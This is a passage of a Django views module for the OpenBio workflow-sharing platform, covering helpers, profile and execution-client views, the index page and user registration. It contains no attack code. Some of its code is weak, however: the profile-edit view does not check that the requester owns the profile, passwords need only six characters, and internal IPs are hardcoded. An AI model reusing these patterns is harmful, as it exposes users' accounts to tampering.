from django.contrib.auth import login as django_login # To distinguish from AJAX called login
from django.contrib.auth import logout as django_logout # To distinguish from AJAX called logout
from django.core.exceptions import ObjectDoesNotExist, ValidationError
from django.core.validators import URLValidator
from django.core.mail import send_mail
from django.db.models import Q # https://docs.djangoproject.com/en/2.1/topics/db/queries/#complex-lookups-with-q-objects
from django.db.models import Max # https://docs.djangoproject.com/en/2.1/topics/db/aggregation/
from django.db.models import Count # https://stackoverflow.com/questions/7883916/django-filter-the-model-on-manytomany-count
from django.utils import timezone
#from django.utils.html import escape # https://docs.djangoproject.com/en/2.2/ref/utils/#module-django.utils.html
from django.views.decorators.csrf import csrf_exempt # https://stackoverflow.com/questions/17716624/django-csrf-cookie-not-set/51398113
# Get csrf_token
# https://stackoverflow.com/questions/3289860/how-can-i-embed-django-csrf-token-straight-into-html
from django.middleware.csrf import get_token
#Import database objects
from app.models import OBC_user, Tool, Workflow, Variables, ToolValidations, \
OS_types, Keyword, Report, ReportToken, Reference, ReferenceField, Comment, \
UpDownCommentVote, UpDownToolVote, UpDownWorkflowVote, ExecutionClient
from app.models import create_nice_id
#Import executor
from ExecutionEnvironment.executor import create_bash_script, OBC_Executor_Exception
# Email imports
import smtplib
from email.message import EmailMessage
# System imports
import io
import os
import re
import six
import time # for time.sleep
import uuid
import hashlib
#import datetime # Use timezone.now()
import logging # https://docs.djangoproject.com/en/2.1/topics/logging/
from collections import Counter, defaultdict
import urllib.parse # https://stackoverflow.com/questions/40557606/how-to-url-encode-in-python-3/40557716
# Installed packages imports
import simplejson
from ansi2html import Ansi2HTMLConverter # https://github.com/ralphbean/ansi2html/
#https://pybtex.org/
from pybtex.database import parse_string as parse_reference_string
import pybtex.database.input.bibtex
import pybtex.plugin
import requests # Used in DOI resolution
# https://github.com/lepture/mistune
import mistune
__version__ = '0.1.7rc'
# Get an instance of a logger
logger = logging.getLogger(__name__)
#GLOBAL CONSTANTS
g = {
'SERVER': 'https://www.openbio.eu',
'EMAIL': 'info@swww.openbio.eu',
'ADMIN': 'kantale@ics.forth.gr', # In case the email fail, use this instead
'DEFAULT_DEBUG_PORT': 8200,
'SEARCH_TOOL_TREE_ID': '1',
'DEPENDENCY_TOOL_TREE_ID': '2',
'VARIABLES_TOOL_TREE_ID': '3',
'SEARCH_WORKFLOW_TREE_ID': '4',
'SEARCH_REPORT_TREE_ID': '5',
'format_time_string' : '%a, %d %b %Y %H:%M:%S', # RFC 2822 Internet email standard. https://docs.python.org/2/library/time.html#time.strftime # '%Y-%m-%d, %H:%M:%S'
'instance_settings' : {
'cb62fc6f-f203-4525-bf40-947cbf51bda3': {
'port': 8200,
'controller_url': 'http://139.91.190.79:8080/post',
},
'341422c9-36c4-477e-81b7-26a76c77dd9a': {
'port': 8201,
'controller_url': 'http://139.91.190.79:8081/post'
},
'default': {
'port': 8200,
'controller_url': 'http://139.91.190.79:8080/post',
},
},
'instance_setting_not_found_printed': False,
'ansi2html_converter': Ansi2HTMLConverter(), # https://github.com/ralphbean/ansi2html/
'markdown': mistune.Markdown(escape=True), # If you care about performance, it is better to re-use the Markdown instance:
# escape=True should be the default option for mistune...
# 'pybtex': {
# 'pybtex_style': pybtex.plugin.find_plugin('pybtex.style.formatting', 'plain')(),
# 'pybtex_html_backend': pybtex.plugin.find_plugin('pybtex.backends', 'html')(),
# 'pybtex_parser': pybtex.database.input.bibtex.Parser()
# }
# materialize js tree icons
# https://materializecss.com/icons.html
'jstree_icons': {
'tools': 'settings',
'variables': 'chevron_right', # Tool variables
'workflows': 'device_hub',
'reports': 'description',
'references': 'link',
'users': 'person',
'qas': 'forum',
},
'url_validator': URLValidator(), # Can be customized: URLValidator(schemes=('http', 'https', 'ftp', 'ftps', 'rtsp', 'rtmp'))
'client_name_regex': r'^[\w]+$', # The regular expression to validate the name of exutation client
'client_max': 10, # Max number of execution clients
# Create the URL for the report generated in the OBC client
'create_client_download_report_url': lambda client_url, nice_id : urllib.parse.urljoin(client_url + '/', 'download/{NICE_ID}'.format(NICE_ID=nice_id)),
'create_client_download_log_url': lambda client_url, nice_id: urllib.parse.urljoin(client_url + '/', 'logs/{NICE_ID}'.format(NICE_ID=nice_id)),
'create_client_check_status_url': lambda client_url, nice_id: urllib.parse.urljoin(client_url + '/', 'check/id/{NICE_ID}'.format(NICE_ID=nice_id)),
'create_client_pause_url': lambda client_url, nice_id: urllib.parse.urljoin(client_url + '/', 'workflow/{NICE_ID}/paused/true'.format(NICE_ID=nice_id)),
'create_client_resume_url': lambda client_url, nice_id: urllib.parse.urljoin(client_url + '/', 'workflow/{NICE_ID}/paused/false'.format(NICE_ID=nice_id)),
'create_client_abort_url': lambda client_url, nice_id: urllib.parse.urljoin(client_url + '/', 'workflow/delete/{NICE_ID}'.format(NICE_ID=nice_id)),
'create_client_airflow_url': lambda client_url, nice_id: urllib.parse.urljoin(client_url + '/', 'admin/airflow/graph?dag_id={NICE_ID}&execution_date='.format(NICE_ID=nice_id)),
}
### HELPING FUNCTIONS AND DECORATORS #####
def md5(t):
'''
Return the md5 hash of this string
'''
return hashlib.md5(t.encode("utf-8")).hexdigest()
def valid_url(url):
'''
Is url valid?
Uses django's URLvalidator
'''
try:
g['url_validator'](url)
except ValidationError:
return False
else:
return True
def user_is_validated(request):
'''
Is the email of the user validated?
Returns True/False
'''
if request.user.is_anonymous:
#print ('User is anonymous')
return False
try:
obc_user = OBC_user.objects.get(user=request.user)
except ObjectDoesNotExist:
#print ('User does not exist')
return False # This should never happen
ret = obc_user.email_validated
#print ('User is validated:', ret)
return ret
def resolve_doi(doi):
'''
https://gist.github.com/jrsmith3/5513926
Return a bibTeX string of metadata for a given DOI.
Used in references_process_doi
'''
url = "http://dx.doi.org/" + doi
headers = {"accept": "application/x-bibtex"}
r = requests.get(url, headers = headers)
if r.status_code == requests.codes.ok:
return r.text
return None
def replace_interlinks(text):
'''
Search for interlinks and replace with javascript calls
'''
ret = text
def javascript_call(matched_string, arguments):
'''
Create the javascript call
'''
func_call = '''window.OBCUI.interlink({});'''.format(simplejson.dumps(arguments))
pattern = '''<a href="javascript:void(0);" onclick='{}'>{}</a>'''.format(func_call, matched_string)
return pattern
interlink_options = {
'tools': {
'findall': r'[^\w]([td]/[\w]+/[\w\.]+/[\d]+)',
'arguments': r'(?P<type>[td])/(?P<name>[\w]+)/(?P<version>[\w\.]+)/(?P<edit>[\d]+)',
'exists': lambda arguments: Tool.objects.filter(name__iexact=arguments['name'], version__iexact=arguments['version'], edit=int(arguments['edit'])).exists()
},
'workflows': {
'findall': r'[^\w](w/[\w]+/[\d]+)',
'arguments': r'(?P<type>w)/(?P<name>[\w]+)/(?P<edit>[\d]+)',
'exists': lambda arguments: Workflow.objects.filter(name__iexact=arguments['name'], edit=int(arguments['edit'])).exists()
},
'references': {
'findall': r'[^\w](r/[\w]+)',
'arguments': r'(?P<type>r)/(?P<name>[\w]+)',
'exists': lambda arguments: Reference.objects.filter(name__iexact=arguments['name']).exists()
},
'users': {
'findall': r'[^\w](u/[\w]+)',
'arguments': r'(?P<type>u)/(?P<username>[\w]+)',
'exists': lambda arguments: OBC_user.objects.filter(user__username__iexact=arguments['username']).exists()
},
'comment': {
'findall': r'[^\w](c/[\d]+)',
'arguments': r'(?P<type>c)/(?P<id>[\d]+)',
'exists': lambda arguments: Comment.objects.filter(pk=int(arguments['id'])).exists()
}
}
for interlink_key, interlink_value in interlink_options.items():
calls = set(re.findall(interlink_value['findall'], ' ' + text)) # We add a space (' ') so that we catch interlinks at the beginning of string
for call in calls:
#print ('call:', call)
#print ('regexp:', interlink_value['arguments'])
arguments = re.search(interlink_value['arguments'], call).groupdict()
if interlink_value['exists'](arguments):
ret = ret.replace(call, javascript_call(call, arguments))
# tool_calls = set(re.findall(interlink_options['tools']['findall'], text))
# for tool_call in tool_calls:
# arguments = re.search(interlink_options['tools']['arguments'], tool_call).groupdict()
# # Does this tool exists?
# if Tool.objects.filter(name=arguments['name'], version=arguments['version'], edit=arguments['edit']).exists():
# ret = ret.replace(tool_call, javascript_call(tool_call, arguments))
return ret
def markdown(t):
'''
https://github.com/lepture/mistune
'''
md = g['markdown'](t)
# Remove <p> at the start and </p> at the end
s = re.search(r'^<p>(.*)</p>\n$', md, re.M | re.S)
if s:
ret = s.group(1)
else:
ret = md
# Check for interlinks
ret = replace_interlinks(ret)
return ret
def jstree_icon_html(t):
'''
Create a html tags for materialize icon
'''
return '<i class="material-icons jsTreeMaterialIcons left md-18">{}</i>'.format(g['jstree_icons'][t])
def fail(error_message=None):
'''
Failed AJAX request
'''
ret = {'success': False, 'error_message': error_message}
json = simplejson.dumps(ret)
return HttpResponse(json, content_type='application/json')
def success(data={}):
'''
success Ajax request
'''
data['success'] = True
json = simplejson.dumps(data)
return HttpResponse(json, content_type='application/json')
def has_data(f):
'''
Decorator that passes AJAX data to a function parameters
'''
def wrapper(*args, **kwargs):
request = args[0]
if request.method == 'POST':
if len(request.POST):
for k in request.POST:
kwargs[k] = request.POST[k]
else:
try:
POST = simplejson.loads(request.body)
except simplejson.errors.JSONDecodeError as e:
return fail('Could not parse JSON data')
for k in POST:
kwargs[k] = POST[k]
elif request.method == 'GET':
for k in request.GET:
kwargs[k] = request.GET[k]
#print ("GET: {} == {}".format(k, kwargs[k]))
return f(*args, **kwargs)
return wrapper
def username_exists(username):
'''
Checks if a username exists
'''
return User.objects.filter(username__iexact=username).exists()
def datetime_to_str(d):
'''
String format
'''
return d.strftime(g['format_time_string'])
def convert_ansi_to_html(ansi):
'''
Create a nice standalone html page from stdout
https://github.com/ralphbean/ansi2html/
'''
return g['ansi2html_converter'].convert(ansi)
def create_uuid_token():
'''
Create a uuid token for email validation
Length: 32 characters
'''
# return str(uuid.uuid4()).split('-')[-1] # Last part: 12 characters
return str(uuid.uuid4()).replace('-', '') # 32 characters
def uuid_is_valid(uuid_token):
'''
https://gist.github.com/ShawnMilo/7777304
'''
try:
val = uuid.UUID(uuid_token, version=4)
except ValueError:
return False
return val.hex == uuid_token.replace('-', '')
def send_mail_smtplib(from_, to, subject, body):
'''
Standard email send function with SMTP
Adjusted from here:
https://docs.python.org/3/library/email.examples.html
NOT USED!
'''
msg = EmailMessage()
msg.set_content(body)
msg['Subject'] = subject
msg['From'] = from_
msg['To'] = to
s = smtplib.SMTP('localhost') # Send the message via our own SMTP server.
s.send_message(msg)
s.quit()
def request_port_to_url(request):
'''
Do we have to append a url with the port?
'''
port = request.META['SERVER_PORT'] # This is a string
if port in ['80', '443']: # Do not add port info when http default or https default
return ''
return ':' + port # For example ':8080'
def create_validation_url(token, port=''):
'''
https://stackoverflow.com/a/5767509/5626738
http://www.example.com/?param1=7¶m2=seven.
FIXME: "platform" should be derived from request.
SEE: https://stackoverflow.com/questions/2491605/how-to-get-the-current-url-name-using-django
'''
ret = '{server}{port}/platform/?validation_token={token}'.format(server=g['SERVER'], token=token, port=port)
return ret
def create_password_email_url(token, port=''):
'''
See also create_validation_url for FIXME issue
'''
ret = '{server}{port}/platform/?password_reset_token={token}'.format(server=g['SERVER'], token=token, port=port)
return ret
def confirm_email_body(token, port=''):
'''
The mail verification mail body
'''
ret = '''
Thank you for signing up to {server}
To complete your registration please click (or copy-paste to your browser) the following link:
{validation_url}
Regards,
The openbio.eu admin team.
'''
return ret.format(server=g['SERVER'], validation_url=create_validation_url(token, port))
def reset_password_email_body(token, port=''):
'''
The email for resetting a password
'''
ret = '''
Dear user,
Someone (hopefully you) has requested to reset the password at {server} .
If this is you, please go to the following link to complete the process:
{password_reset_url}
Otherwise please ignore this email!
Regards,
The openbio.eu admin team.
'''
return ret.format(server=g['SERVER'], password_reset_url=create_password_email_url(token, port))
def validate_user(token):
'''
Validates a user
Returns: True/False, message
'''
try:
obc_user = OBC_user.objects.get(email_validation_token=token)
except ObjectDoesNotExist:
obc_user = None
if obc_user:
if obc_user.email_validated:
return False, "User's email is already validated"
else:
#Validate user
obc_user.email_validated = True
#Delete validation token
obc_user.email_validation_token = None
obc_user.save()
return True, 'Email successfully validated'
else:
return False, 'Unknown or deleted email validation token'
def password_reset_check_token(token):
'''
Check the token for password reset
'''
try:
obc_user = OBC_user.objects.get(password_reset_token=token)
except ObjectDoesNotExist:
obc_user = None
if obc_user:
timestamp = obc_user.password_reset_timestamp
seconds = (now() - timestamp).total_seconds()
if seconds > 3600 * 2: # 2 Hours
return False, 'Password Reset Token expires after 2 Hours', None
else:
return True, '', obc_user
else:
return False, "Unknown token", None
def now():
'''
https://stackoverflow.com/a/415519/5626738
https://stackoverflow.com/questions/18622007/runtimewarning-datetimefield-received-a-naive-datetime
'''
#return datetime.datetime.now()
return timezone.now()
def check_password(password):
'''
Check for password correctness
'''
if len(password) < 6:
return False, 'Minimum password length is 6'
return True, ''
def send_validation_email_inner(request, email):
'''
Send an email validation email
Returns
suc, error_message, uuid_token
'''
uuid_token = create_uuid_token()
if settings.DEBUG:
#print ('VALIDATION EMAIL TOKEN:', uuid_token)
#print ('URL: http://0.0.0.0:{}/platform/?validation_token={}'.format(request.META['SERVER_PORT'], uuid_token))
return True, '', uuid_token
try:
send_mail(
'[{server}] Please confirm your email'.format(server=g['SERVER']), # subject
confirm_email_body(uuid_token, port=request_port_to_url(request)), # body message
g['EMAIL'], # Sender, FROM
[email], # List of recipients
)
except Exception as e:
return False, 'Could not send an email to {email}. Contact {ADMIN}'.format(email=email, ADMIN=g['ADMIN']), None # Better to add None
return True, '', uuid_token
def None_if_empty_or_nonexisting(d, key):
'''
Useful if want to set None values to empty values that we got from Ajax
'''
if not key in d:
return None
value = d[key].strip()
if not value:
return None
return value
def tool_to_json(tool):
if not tool:
return None
return {
'name': tool.name,
'version': tool.version,
'edit': tool.edit,
}
def workflow_to_json(workflow):
if not workflow:
return None
return {
'name': workflow.name,
'edit': workflow.edit,
}
def tool_text_jstree(tool):
'''
The JS tree tool text
The id should have 4 fields.
'''
return '/'.join(map(str, [tool.name, tool.version, tool.edit]))
def tool_node_jstree(tool):
'''
The HTML that is node in a jstree that contains a tool
'''
return tool_text_jstree(tool) + (' <span class="red lighten-3">DRAFT</span>' if tool.draft else '') + jstree_icon_html('tools'),
def workflow_text_jstree(workflow):
'''
The JS tree workflow text
'''
return '/'.join(map(str, [workflow.name, workflow.edit]))
def workflow_node_jstree(workflow):
'''
The HTML that is node in a jstree that contains a workflow
'''
return workflow_text_jstree(workflow) + (' <span class="red lighten-3">DRAFT</span>' if workflow.draft else '') + jstree_icon_html('workflows')
def report_text_jstree(report):
'''
The JS tree report text
'''
return workflow_text_jstree(report.workflow) + '/' + report.nice_id
def tool_id_jstree(tool, id_):
'''
The JS tree tool id
Return a JSON string so that it can have many fields
'''
#return tool_text_jstree(tool) + '/' + str(id_)
return simplejson.dumps([tool.name, tool.version, str(tool.edit), str(id_)])
def tool_id_cytoscape(tool):
'''
The cytoscape tool id
'''
if isinstance(tool, Tool):
return '__'.join([tool.name, tool.version, str(tool.edit), g['DEPENDENCY_TOOL_TREE_ID']])
elif type(tool) is dict:
return '__'.join([tool['name'], tool['version'], str(tool['edit']), g['DEPENDENCY_TOOL_TREE_ID']])
else:
raise Exception('Error: 8151')
def step_id_cytoscape(step_name, workflow, name, edit):
'''
cytoscape step id
'''
return 'step' + '__' + step_name + '__' + workflow_id_cytoscape(workflow, name, edit)
def step_id_label(step_name):
'''
cytoscape step label
'''
return step_name
def tool_label_cytoscape(tool):
'''
The cytoscape tool label
'''
if isinstance(tool, Tool):
return '/'.join([tool.name, tool.version, str(tool.edit)])
elif type(tool) is dict:
return '/'.join([tool['name'], tool['version'], str(tool['edit'])])
else:
raise Exception('Error: 9810')
def workflow_id_cytoscape(workflow, name, edit):
'''
The cytoscape workflow id
'''
if type(workflow) is dict:
return workflow['name'] + '__' + str(workflow['edit'])
if workflow:
return workflow.name + '__' + str(workflow.edit)
return name + '__' + str(edit)
def workflow_label_cytoscape(workflow, name, edit):
'''
The cytoscape workflow label
'''
if workflow:
return workflow.name + '/' + str(workflow.edit)
return name + '/' + str(edit)
def workflow_id_jstree(workflow, id_):
'''
The JS Tree workflow id
Return a JSON string so that it can have many fields
'''
return simplejson.dumps([workflow.name, str(workflow.edit), str(id_)])
def report_id_jstree(report, id_):
'''
The JS Tree Report id
Return a JSON string so that it can have many fields
'''
return simplejson.dumps([report.workflow.name, str(report.workflow.edit), str(report.nice_id), str(id_)])
def tool_variable_node_jstree(variable):
'''
The JSTree variable html
'''
return '{}:{}'.format(variable.name, variable.description) + jstree_icon_html('variables')
def tool_variable_id_jstree(variable, tool, id_):
'''
The JSTree variable id
Returns a JSON string, so that it can have many fields.
It also contains information from the tool
'''
#return variable.name + '/' + variable.value + '/' + variable.description + '/' + str(id_)
return simplejson.dumps([
variable.name, variable.value, variable.description,
str(id_),
tool.name, tool.version, tool.edit])
def tool_get_dependencies_internal(tool, include_as_root=False):
'''
Get the dependencies of this tool in a flat list
Recursive
include_as_root: Should we add this tool as root?
'dependant' needs dependencies..
'''
if include_as_root:
ret = [{'dependant': None, 'dependency': tool}]
else:
ret = []
for dependent_tool in tool.dependencies.all():
ret.append({
'dependant': tool,
'dependency': dependent_tool
})
ret.extend(tool_get_dependencies_internal(dependent_tool, include_as_root=False))
return ret
def tool_build_dependencies_jstree(tool_dependencies, add_variables=False, add_installation_commands=False):
'''
Build JS TREE from tool_dependencies
add_variables: Also add tool/data variables
add_installation_commands: All installation_commands + validation_commands + os_choices
ATTENTION: THIS IS NOT GENERIC!!!
IT uses g['DEPENDENCY_TOOL_TREE_ID'].
'''
tool_dependencies_jstree = []
for tool_dependency in tool_dependencies:
to_append = {
'data': {
# 'name': tool_dependency['dependency'].name,
# 'version': tool_dependency['dependency'].version,
# 'edit': tool_dependency['dependency'].edit,
'type': 'tool',
},
'text': tool_node_jstree(tool_dependency['dependency']), # tool_text_jstree(tool_dependency['dependency']), # This is what is shown on the tree
'cy_label': tool_label_cytoscape(tool_dependency['dependency']), # Label to show in the cytoscape graph
'id': tool_id_jstree(tool_dependency['dependency'], g['DEPENDENCY_TOOL_TREE_ID']), # This is a unique id
'parent': tool_id_jstree(tool_dependency['dependant'], g['DEPENDENCY_TOOL_TREE_ID']) if tool_dependency['dependant'] else '#',
'type': 'tool', ### This is redundant with ['data']['type'], but we need it because
### The node[0].data.type is checked in $scope.tools_var_jstree_model.
### See also issue #93
'name': tool_dependency['dependency'].name,
'version': tool_dependency['dependency'].version,
'edit': tool_dependency['dependency'].edit,
'draft': tool_dependency['dependency'].draft,
}
if add_installation_commands:
to_append['installation_commands'] = tool_dependency['dependency'].installation_commands
to_append['validation_commands'] = tool_dependency['dependency'].validation_commands
to_append['os_choices'] = [choice.os_choices for choice in tool_dependency['dependency'].os_choices.all()]
to_append['dependencies'] = [str(t) for t in tool_dependency['dependency'].dependencies.all()]
tool_dependencies_jstree.append(to_append)
# Add the variables of this tool
if add_variables:
for variable in tool_dependency['dependency'].variables.all():
tool_dependencies_jstree.append({
'data': {
'type': 'variable',
'name': variable.name,
'value': variable.value,
'description': variable.description,
},
'text': tool_variable_node_jstree(variable),
'id': tool_variable_id_jstree(variable, tool_dependency['dependency'], g['VARIABLES_TOOL_TREE_ID']),
'parent': tool_id_jstree(tool_dependency['dependency'], g['DEPENDENCY_TOOL_TREE_ID']),
'type': 'variable', # TODO: FIX REDUNDANCY WITH ['data']['type']
})
return tool_dependencies_jstree
### HELPING FUNCTIONS AND DECORATORS END #######
### VIEWS ############
def get_instance_settings():
'''
Gets the id of this local installation
We are running multiple server instances for development
Each instance should have their own port
'''
if not os.path.exists('id.txt'):
if not g['instance_setting_not_found_printed']:
logger.warning('Could not find id.txt setting default')
g['instance_setting_not_found_printed'] = True
return g['instance_settings']['default']
with open('id.txt') as f:
this_id = f.read().strip()
return g['instance_settings'][this_id]
### USERS
@has_data
def users_search_3(request, **kwargs):
'''
Get profile info for a single user.
This is called from:
* Click on profile
* Click on a user node in left panel jstree
'''
username = kwargs.get('username', '')
if not username:
return fail('Could not get username')
try:
u = OBC_user.objects.get(user__username__iexact=username)
except ObjectDoesNotExist as e:
return fail('Could not find user with this username')
ret = {
'profile_username': username,
'profile_firstname': u.first_name,
'profile_lastname': u.last_name,
'profile_website': u.website,
'profile_affiliation': u.affiliation,
'profile_publicinfo': u.public_info,
'profile_created_at': datetime_to_str(u.user.date_joined), # https://docs.djangoproject.com/en/2.2/ref/contrib/auth/#django.contrib.auth.models.User.date_joined
}
# only for registered user:
# * get mail
# * get ExecutionClients
if username == request.user.username:
ret['profile_email'] = u.user.email
ret['profile_clients'] = [{'name': client.name, 'client': client.client} for client in u.clients.all()]
else:
ret['profile_email'] = ''
return success(ret)
@has_data
def user_add_client(request, **kwargs):
'''
Called from $scope.profile_add_client when user adds a new Execution Client
URL: user_add_client/
'''
# Get the user
try:
obc_user = OBC_user.objects.get(user=request.user)
except ObjectDoesNotExist:
return fail('Error 8619'); # This should never happen
#Get and validate the name
name = kwargs.get('name', '')
if not re.match(g['client_name_regex'], name):
return fail('Invalid client name (allowed characters, a-z, A-Z, 0-9, _)')
# Get and validate the client
client = kwargs.get('client', '')
if not valid_url(client):
return fail('URL is invalid')
# Check that the name and the client does not exist and that maximum number has not been reached
existing_clients = [{'name':x.name, 'client': x.client} for x in obc_user.clients.all()]
if len(existing_clients) >= g['client_max']:
return fail('Maximum number of Execution Clients has been reached')
existing_names = {x['name'] for x in existing_clients}
existing_urls = {x['client'] for x in existing_clients}
if name in existing_names:
return fail('There is already an Execution Client with this name')
if client in existing_urls:
return fail('There is already an Execution Client with this URL')
## Add the execution environment
new_execution_client = ExecutionClient(name=name, client=client)
new_execution_client.save()
obc_user.clients.add(new_execution_client)
# Return all the profile clients
ret = {
'profile_clients' : [{'name': client.name, 'client': client.client} for client in obc_user.clients.all()]
}
obc_user.save()
return success(ret)
@has_data
def user_delete_client(request, **kwargs):
'''
Called from $scope.profile_delete_client
URL: user_delete_client
'''
name = kwargs.get('name', '')
if not name:
return fail('Error 3498')
# Get the user
try:
obc_user = OBC_user.objects.get(user=request.user)
except ObjectDoesNotExist:
return fail('Error 8686'); # This should never happen
# Get the Execution Client
try:
ec = ExecutionClient.objects.get(obc_user=obc_user, name=name)
except ObjectDoesNotExist as e:
return fail('Error 4555')
# Delete the Execution Client
ec.delete()
# Return all the profile clients
ret = {
'profile_clients' : [{'name': client.name, 'client': client.client} for client in obc_user.clients.all()]
}
return success(ret)
@has_data
def users_edit_data(request, **kwargs):
'''
Called by users_edit_data/
Edit user's profile data
'''
username = kwargs.get('username', '')
if not username:
return fail('Could not get username')
try:
obc_user = OBC_user.objects.get(user__username=username)
except ObjectDoesNotExist as e:
return fail('Could not find user with this username')
obc_user.first_name = kwargs.get('profile_firstname', '')
obc_user.last_name = kwargs.get('profile_lastname', '')
website = kwargs.get('profile_website', '')
if website:
if not valid_url(website):
return fail('website is not a valid URL')
obc_user.website = website
obc_user.affiliation = kwargs.get('profile_affiliation', '')
obc_user.public_info = kwargs.get('profile_publicinfo', '')
#Save edits
obc_user.save()
#Confirm by getting new data
return users_search_3(request, **kwargs)
def users_search_2(
main_search,
):
'''
Collect all users from main search
'''
username_Q = Q(user__username__icontains=main_search)
affiliation_Q = Q(affiliation__icontains=main_search)
publicinfo_Q = Q(public_info__icontains=main_search)
results = OBC_user.objects.filter(username_Q | affiliation_Q | publicinfo_Q)
users_search_jstree = []
for result in results:
to_add = {
'data': {'username': result.user.username},
'text': result.user.username + jstree_icon_html('users'),
'id': result.user.username,
'parent': '#',
'state': { 'opened': True},
}
users_search_jstree.append(to_add)
ret = {
'main_search_users_number': results.count(),
'users_search_jstree': users_search_jstree,
}
return ret
def get_scheme(request):
'''
https://stackoverflow.com/a/36817763/5626738
http or https ?
'''
scheme = 'https' if request.is_secure() else "http"
return scheme
def get_server_url(request):
'''
Get the URL of the server
'''
return '{}://{}/platform'.format(get_scheme(request), request.get_host())
def get_execution_clients(request):
'''
Get all execution clients of the user
'''
if request.user.is_anonymous:
return []
obc_user = OBC_user.objects.get(user=request.user)
ret = list(obc_user.clients.values('client', 'name'))
return ret
def get_execution_clients_angular(request):
'''
Angular excepts an empty entry at the end
'''
return get_execution_clients(request) + [{'name': '', 'client': ''}];
### END OF USERS
def index(request, **kwargs):
'''
View url: ''
'''
#print ('kwargs')
#print (kwargs)
context = {}
context['general_alert_message'] = ''
context['general_success_message'] = ''
# Are we linking to a specific RO?
init_interlink_args = {}
# tool linking
tool_name = kwargs.get('tool_name', '')
tool_version = kwargs.get('tool_version', '')
tool_edit = kwargs.get('tool_edit', 0)
if tool_name and tool_version and tool_edit:
if Tool.objects.filter(name=tool_name, version=tool_version, edit=int(tool_edit)).exists():
init_interlink_args = {
'type': 't',
'name': tool_name,
'version': tool_version,
'edit': int(tool_edit),
}
else:
context['general_alert_message'] = 'Tool {}/{}/{} does not exist'.format(tool_name, tool_version, tool_edit)
# workflow linking
workflow_name = kwargs.get('workflow_name', '')
workflow_edit = kwargs.get('workflow_edit', 0)
if workflow_name and workflow_edit:
if Workflow.objects.filter(name=workflow_name, edit=int(workflow_edit)).exists():
init_interlink_args = {
'type': 'w',
'name': workflow_name,
'edit': int(workflow_edit),
}
else:
context['general_alert_message'] = 'Workflow {}/{} does not exist'.format(workflow_name, workflow_edit)
#references linking
reference_name = kwargs.get('reference_name', '')
if reference_name:
if Reference.objects.filter(name__iexact=reference_name).exists():
init_interlink_args = {
'type': 'r',
'name': reference_name,
}
else:
context['general_alert_message'] = 'Reference {} does not exist'.format(reference_name)
# user linking
user_username = kwargs.get('user_username', '')
if user_username:
if OBC_user.objects.filter(user__username=user_username).exists():
init_interlink_args = {
'type': 'u',
'username': user_username,
}
else:
context['general_alert_message'] = 'User {} does not exist'.format(user_username)
# comment link
comment_id = kwargs.get('comment_id', '')
if comment_id:
if Comment.objects.filter(pk=int(comment_id)).exists():
init_interlink_args = {
'type': 'c',
'id': int(comment_id),
}
else:
context['general_alert_message'] = 'Comment with id={} does not exist'.format(comment_id)
# Report link
report_run = kwargs.get('report_run', '')
if report_run:
if Report.objects.filter(nice_id=report_run).exists():
init_interlink_args = {
'type': 'report',
'run': report_run,
}
else:
context['general_alert_message'] = 'Report {} does not exist'.format(report_run)
context['init_interlink_args'] = simplejson.dumps(init_interlink_args)
# Is this user already logged in?
# https://stackoverflow.com/questions/4642596/how-do-i-check-whether-this-user-is-anonymous-or-actually-a-user-on-my-system
if request.user.is_anonymous:
#print ('User is anonumous')
username = ''
else:
username = request.user.username
#print ('Username: {}'.format(username))
context['username'] = username
context['password_reset_token'] = ''
context['reset_signup_username'] = ''
context['reset_signup_email'] = ''
#Check for GET variables
GET = request.GET
# EMAIL VALIDATION
validation_token = GET.get('validation_token', '')
if validation_token:
validation_success, validation_message = validate_user(validation_token)
if validation_success:
context['general_success_message'] = validation_message
else:
context['general_alert_message'] = validation_message
#Is user validated
context['user_is_validated'] = user_is_validated(request)
# PASSWORD RESET
password_reset_token = GET.get('password_reset_token', '')
context['password_reset_token'] = '' # It will be set after checks
if password_reset_token:
password_reset_check_success, password_reset_check_message, obc_user = password_reset_check_token(password_reset_token)
if password_reset_check_success:
context['password_reset_token'] = password_reset_token
context['reset_signup_username'] = obc_user.user.username
context['reset_signup_email'] = obc_user.user.email
else:
context['general_alert_message'] = password_reset_check_message
# Show warning when running in default Django port
port = int(request.META['SERVER_PORT'])
if settings.DEBUG:
# Running with DEBUG True
if port == 8000:
logger.warning('WARNING: YOU ARE RUNNING IN DEFAULT DJANGO PORT (8000)')
if port != g['DEFAULT_DEBUG_PORT']:
logger.warning(f'WARNING: You are not runining on port {g['DEFAULT_DEBUG_PORT']}')
context['debug'] = settings.DEBUG # If this is True, then we include tests.js
# Add port information or other insrtance settings on template
instance_settings = get_instance_settings()
context['port'] = instance_settings['port']
context['controller_url'] = instance_settings['controller_url']
# Get OS choices
context['os_choices'] = simplejson.dumps(OS_types.get_angular_model());
# Get User clients
context['profile_clients'] = get_execution_clients_angular(request)
# Add version
context['version'] = __version__
return render(request, 'app/index.html', context)
@has_data
def register(request, **kwargs):
'''
View url: 'register/'
add user add
'''
if not 'signup_username' in kwargs:
return fail('username is required')
signup_username = kwargs['signup_username']
if not re.match(r'^\w+$', signup_username):
return fail('username can only contain alphanumeric characters')
if username_exists(signup_username):
return fail('username: {} exists already'.format(signup_username))
if not 'signup_password' in kwargs:
return fail('password is required')
signup_password = kwargs['signup_password']
check_password_success, check_password_message = check_password(signup_password)
if not check_password_success:
return fail(check_password_message)
if not 'signup_confirm_password' in kwargs:
return fail('confirm password is required')
signup_confirm_password = kwargs['signup_confirm_password']
if signup_password != signup_confirm_password:
return fail('Confirm password does not match password')
if not 'signup_email' in kwargs:
return fail('email is required')
signup_email = kwargs['signup_email'] # https://www.tecmint.com/setup-postfix-mail-server-in-ubuntu-debian/
## Do we allow users with the same email address?
try:
OBC_user.objects.get(user__email = signup_email)
except ObjectDoesNotExist:
pass # This is ok!
else:
# An exception did NOT happen (as it should)
return fail('A user with this email already exists')
## smtplib method
# try:
# send_mail(
# from_=g['EMAIL'],
# to=signup_email,
# subject='[{server}] Please confirm your email'.format(server=g['SERVER']),
# body=confirm_email_body(uuid_token, port=request_port_to_url(request)),
# )
# except smtplib.SMTPRecipientsRefused:
# return fail('Could not sent an email to {}'.format(signup_email))
# except Exception as e:
# pass ## FIXME
## django send_mail
suc, error_message, uuid_token = send_validation_email_inner(request, signup_email)
if not suc:
return fail(error_message)
#Create user
user = User.objects.create_user(signup_username, signup_email, signup_password, last_login=now()) # https://stackoverflow.com/questions/33683619/null-value-in-column-last-login-violates-not-null-constraint/42502311
#Create OBC_user
#If we are running in DEBUG, then new users are validated. If we set this to False then we need a send mail service to testing platform
#In production new users are not validated by default
